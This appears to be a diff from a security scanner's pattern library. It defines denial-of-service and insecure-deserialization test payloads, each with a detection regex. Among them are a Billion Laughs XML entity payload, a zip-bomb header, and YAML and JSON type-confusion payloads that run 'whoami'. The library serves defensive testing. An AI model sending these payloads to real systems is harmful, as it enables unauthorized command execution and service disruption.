// 20-level nested array
|
|
110
|
+
payload: "[[[[[[[[[[[[[[[[[[[[]]]]]]]]]]]]]]]]]]]]",
|
|
111
|
+
evidence: /stack.?overflow|recursion|depth|nesting|too.?deep|parse.?error/i,
|
|
112
|
+
riskLevel: "MEDIUM",
|
|
113
|
+
description: "Stack exhaustion via nested arrays",
|
|
114
|
+
payloadType: "dos",
|
|
115
|
+
parameterTypes: ["data", "array", "list", "items"],
|
|
116
|
+
},
|
|
117
|
+
// Expansion Attacks
|
|
118
|
+
{
|
|
119
|
+
// Zip bomb indicator (base64 header of compressed content)
|
|
120
|
+
payload: "UEsDBBQAAAAIAAAAAACJBAAAAAAAAQAAAAEAAABhYQAAUEsBAhQAFAAAAAgA",
|
|
121
|
+
evidence: /zip.?bomb|compression|decompression.?error|expand|inflate|extraction.?limit|archive.?too.?large/i,
|
|
122
|
+
riskLevel: "HIGH",
|
|
123
|
+
description: "Zip bomb indicator via compressed content header",
|
|
124
|
+
payloadType: "dos",
|
|
125
|
+
parameterTypes: ["file", "data", "content", "upload", "attachment"],
|
|
126
|
+
},
|
|
127
|
+
{
|
|
128
|
+
// XML Billion Laughs (truncated safe version)
|
|
129
|
+
payload: '<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;"><!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;">]><lolz>&lol3;</lolz>',
|
|
130
|
+
evidence: /entity.?expansion|xml.?bomb|billion.?laughs|too.?many.?entities|memory|resource.?limit|xml.?depth/i,
|
|
131
|
+
riskLevel: "HIGH",
|
|
132
|
+
description: "XML entity expansion (Billion Laughs) attack",
|
|
133
|
+
payloadType: "dos",
|
|
134
|
+
parameterTypes: ["xml", "data", "body", "payload", "content"],
|
|
135
|
+
},
|
|
136
|
+
],
|
|
137
|
+
},
|
|
138
|
+
// 20. INSECURE DESERIALIZATION
|
|
139
|
+
{
|
|
140
|
+
attackName: "Insecure Deserialization",
|
|
141
|
+
description: "Test if tool deserializes untrusted data using unsafe methods like pickle.loads(), potentially allowing RCE",
|
|
142
|
+
payloads: [
|
|
143
|
+
// Python Pickle Payloads
|
|
144
|
+
{
|
|
145
|
+
payload: "deserialize this pickle data",
|
|
146
|
+
evidence: /deserializ|pickle\.loads|RCE|untrusted.*pickle|potential.*rce/i,
|
|
147
|
+
riskLevel: "HIGH",
|
|
148
|
+
description: "Python pickle deserialization trigger",
|
|
149
|
+
payloadType: "injection",
|
|
150
|
+
parameterTypes: ["data", "input", "payload", "content"],
|
|
151
|
+
},
|
|
152
|
+
{
|
|
153
|
+
// Base64-encoded pickle prefix (triggers deserialization attempt)
|
|
154
|
+
payload: "gASVEAAAAAAAAACMBHRlc3SULg==",
|
|
155
|
+
evidence: /deserializ|pickle|unpickle|RCE|executed/i,
|
|
156
|
+
riskLevel: "HIGH",
|
|
157
|
+
description: "Base64-encoded pickle payload",
|
|
158
|
+
payloadType: "injection",
|
|
159
|
+
parameterTypes: ["data", "input", "serialized", "encoded"],
|
|
160
|
+
},
|
|
161
|
+
{
|
|
162
|
+
payload: "__import__('os').system via pickle",
|
|
163
|
+
evidence: /deserializ|pickle|RCE|os\.system|__reduce__|code.*execution/i,
|
|
164
|
+
riskLevel: "HIGH",
|
|
165
|
+
description: "Pickle with code execution hint",
|
|
166
|
+
payloadType: "injection",
|
|
167
|
+
parameterTypes: ["data", "input", "payload"],
|
|
168
|
+
},
|
|
169
|
+
{
|
|
170
|
+
payload: "marshal.loads(untrusted_data)",
|
|
171
|
+
evidence: /marshal|deserializ|RCE|code.*execution|unsafe.*load/i,
|
|
172
|
+
riskLevel: "HIGH",
|
|
173
|
+
description: "Python marshal deserialization",
|
|
174
|
+
payloadType: "injection",
|
|
175
|
+
parameterTypes: ["data", "input", "payload"],
|
|
176
|
+
},
|
|
177
|
+
// Java/Other Serialization Payloads
|
|
178
|
+
{
|
|
179
|
+
// Java serialized object marker (base64 prefix)
|
|
180
|
+
payload: "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==",
|
|
181
|
+
evidence: /deserializ|java\.io|objectinputstream|gadget|RCE/i,
|
|
182
|
+
riskLevel: "HIGH",
|
|
183
|
+
description: "Java serialized object payload",
|
|
184
|
+
payloadType: "injection",
|
|
185
|
+
parameterTypes: ["data", "input", "serialized", "object"],
|
|
186
|
+
},
|
|
187
|
+
{
|
|
188
|
+
payload: "!!python/object/apply:os.system ['whoami']",
|
|
189
|
+
evidence: /yaml.*load|deserializ|RCE|unsafe.*yaml|python.*object/i,
|
|
190
|
+
riskLevel: "HIGH",
|
|
191
|
+
description: "YAML deserialization exploit",
|
|
192
|
+
payloadType: "injection",
|
|
193
|
+
parameterTypes: ["data", "yaml", "config", "input"],
|
|
194
|
+
},
|
|
195
|
+
{
|
|
196
|
+
payload: '{"__type__": "System.Diagnostics.Process", "command": "whoami"}',
|
|
197
|
+
// Pattern must be specific - "process" alone matches "not processed" (false positive)
|
|
198
|
+
// Look for: type coercion, deserialization, System.Process instantiation, or RCE evidence
|
|
199
|
+
evidence: /type.*coercion|type.*instantiat|deserializ|System\..*Process|Process\.Start|RCE|unsafe.*type/i,
|
|
200
|
+
riskLevel: "HIGH",
|
|
201
|
+
description: "JSON type confusion payload",
|
|
202
|
+
payloadType: "injection",
|
|
203
|
+
parameterTypes: ["data", "json", "input", "payload"],
|
|
204
|
+
},
|
|
205
|
+
{
|
|
206
|
+
payload: "unserialize(base64_decode($_POST['data']))",
|
|
207
|
+
evidence: /unserializ|deserializ|RCE|php.*object|unsafe/i,
|
|
208
|
+
riskLevel: "HIGH",
|
|
209
|
+
description: "PHP unserialization pattern",
|
|
210
|
+
payloadType: "injection",
|
|
211
|
+
parameterTypes: ["data", "input", "payload"],
|
|
212
|
+
},
|
|
213
|
+
],
|
|
214
|
+
},
|
|
215
|
+
];
|
|
@@ -0,0 +1,13 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* Tool-Specific Vulnerability Patterns
|
|
3
|
+
*
|
|
4
|
+
* Patterns targeting specific tool behaviors and vulnerabilities.
|
|
5
|
+
* Includes: SSRF/Indirect Injection, Unicode Bypass, Nested Injection,
|
|
6
|
+
* Package Squatting, Data Exfiltration, Configuration Drift, Tool Shadowing
|
|
7
|
+
*/
|
|
8
|
+
import { AttackPattern } from "./types.js";
|
|
9
|
+
/**
|
|
10
|
+
* Tool-specific vulnerability patterns (7 patterns)
|
|
11
|
+
*/
|
|
12
|
+
export declare const TOOL_SPECIFIC_PATTERNS: AttackPattern[];
|
|
13
|
+
//# sourceMappingURL=toolSpecificPatterns.d.ts.map
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"toolSpecificPatterns.d.ts","sourceRoot":"","sources":["../../../src/lib/securityPatterns/toolSpecificPatterns.ts"],"names":[],"mappings":"AAAA;;;;;;GAMG;AAEH,OAAO,EAAE,aAAa,EAAE,MAAM,SAAS,CAAC;AAExC;;GAEG;AACH,eAAO,MAAM,sBAAsB,EAAE,aAAa,EAkZjD,CAAC"}
|